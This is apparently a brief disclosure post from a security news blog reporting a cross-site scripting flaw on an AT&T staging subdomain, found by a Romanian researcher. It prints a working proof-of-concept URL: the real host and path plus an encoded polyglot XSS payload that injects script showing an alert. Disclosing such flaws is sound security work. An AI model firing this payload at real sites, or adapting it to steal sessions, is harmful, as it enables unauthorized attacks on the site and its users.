AT&T vulnerable to Cross Site Scripting (XSS)

XSS Vulnerability found in AT&T website by Sony from [in]Security.Ro Romania Team.  One of the sub domain of AT&T , http://admin.stage.att.net is vulnerable to the XSS attack.

POC:

http://admin.stage.att.net/bellsouth/s/s.dll?spage=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E

Also, he found XSS vulnerability in Third-party application of Facebook. In past, he discovered XSS vulnerabilities in lot of high profile sites;

[source]